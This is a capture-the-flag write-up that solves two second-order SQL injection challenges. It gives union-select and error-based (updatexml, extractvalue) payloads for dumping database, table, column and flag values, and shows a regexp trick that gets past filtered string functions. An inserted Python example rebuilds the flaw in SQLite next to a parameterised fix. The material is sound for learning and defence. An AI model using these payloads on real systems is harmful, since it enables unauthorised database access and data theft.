twice_sql_injection

Challenge

Second-order injection

After registering with 1' and logging in, the info field shows nothing, while a normally registered account can edit its info freely and it is displayed (that is the echo position). So use 1' union select database()# to get the database name.


Next dump the table names, column names and the flag.

1' union select group_concat(table_name) from information_schema.tables where table_schema='ctftraining'#


1' union select group_concat(column_name) from information_schema.columns where table_schema='ctftraining' && table_name='flag'#


1' union select group_concat(flag) from ctftraining.flag#


rcctf2015-easysql

Challenge approach

Second-order injection


First register with admin", log in and change the password: it produces an error.


The double quote closes the literal, so the executed statement is guessed to be:

select (change password) where username="admin"" and password=' c4ca4238a0b923820dcc509a6f75849b '

So there is a second-order injection: the username is stored safely at registration but spliced unescaped into the later password-change query. Registering with 123"||(extractvalue(1,concat(0x7e,database())))# gives an error that leaks the value.
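As an added illustration (not code from the original write-up), the register / change-password flow guessed above rebuilt in Python on an in-memory SQLite table: registration binds its parameters, the vulnerable password change splices the stored username into the UPDATE, and the fixed version binds it. SQLite single-quoted literals stand in for the challenge's MySQL double-quote closure; the alice and admin' accounts and all function names are constructed for this demo.

```python
import hashlib
import sqlite3


def md5_hex(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def new_db() -> sqlite3.Connection:
    # Constructed schema with one pre-existing victim account.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT)")
    conn.execute("INSERT INTO users VALUES (?, ?)", ("alice", md5_hex("alice-pw")))
    return conn


def register(conn: sqlite3.Connection, username: str, password: str) -> None:
    # First-order input is bound, so a name such as admin' is stored verbatim,
    # quote included. Nothing breaks here, which is why the bug is second-order.
    conn.execute("INSERT INTO users VALUES (?, ?)", (username, md5_hex(password)))
    conn.commit()


def change_password_vulnerable(conn: sqlite3.Connection, username: str, new_password: str):
    # The username now comes from the session/database and is treated as trusted:
    # string-built SQL lets the stored quote terminate the literal early.
    # Returns affected rows, or the database error text when the statement fails.
    sql = "UPDATE users SET password='%s' WHERE username='%s'" % (md5_hex(new_password), username)
    try:
        cur = conn.execute(sql)
        conn.commit()
        return cur.rowcount
    except sqlite3.Error as exc:
        return "error: %s" % exc


def change_password_safe(conn: sqlite3.Connection, username: str, new_password: str) -> int:
    # Fix: bind every value, whether it arrived in the request or was read back
    # from the database. Stored data is not safer than request data.
    cur = conn.execute("UPDATE users SET password=? WHERE username=?", (md5_hex(new_password), username))
    conn.commit()
    return cur.rowcount


def demo():
    conn = new_db()
    register(conn, "admin'", "pw1")
    vuln = change_password_vulnerable(conn, "admin'", "pw2")  # fails, as in the write-up
    safe = change_password_safe(conn, "admin'", "pw2")        # exactly one row updated
    alice = conn.execute("SELECT password FROM users WHERE username='alice'").fetchone()[0]
    return vuln, safe, alice == md5_hex("alice-pw")
```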


That gives the database name; next dump the table names and column names.

123"||(updatexml(1,concat('~',(select(group_concat(table_name))from(information_schema.tables)where(table_schema='web_sqli'))),1))#


123"||(updatexml(1,concat('~',(select(group_concat(column_name))from(information_schema.columns)where(table_name='users'))),1))#


The column names are truncated, and the mid, left and right functions are filtered, so a regex match can be used instead: string regexp '^r'

123"||(updatexml(1,concat(0x3a,(select(group_concat(column_name))from(information_schema.columns)where(table_name='users')&&(column_name)regexp('^r'))),1))#


123"||(updatexml(1,concat(0x3a,(select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('^f'))),1))#


The error output is length-limited, so use reverse to get the latter part of the flag.


Reversing the output gives the tail of the flag.


Piece the two halves together to get the flag. Done.